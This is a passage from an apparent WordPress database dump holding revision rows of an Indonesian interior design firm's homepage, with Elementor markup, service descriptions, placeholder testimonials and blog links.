10:04:40','2023-09-22 10:04:40','',22,'https://bauhaus.futuremediatrix.com/?p=4924',0,'revision','',0),(4925,3,'2023-09-22 10:04:40','2023-09-22 10:04:40','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:04:40','2023-09-22 10:04:40','',22,'https://bauhaus.futuremediatrix.com/?p=4925',0,'revision','',0),(4926,3,'2023-09-22 10:04:40','2023-09-22 10:04:40','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a 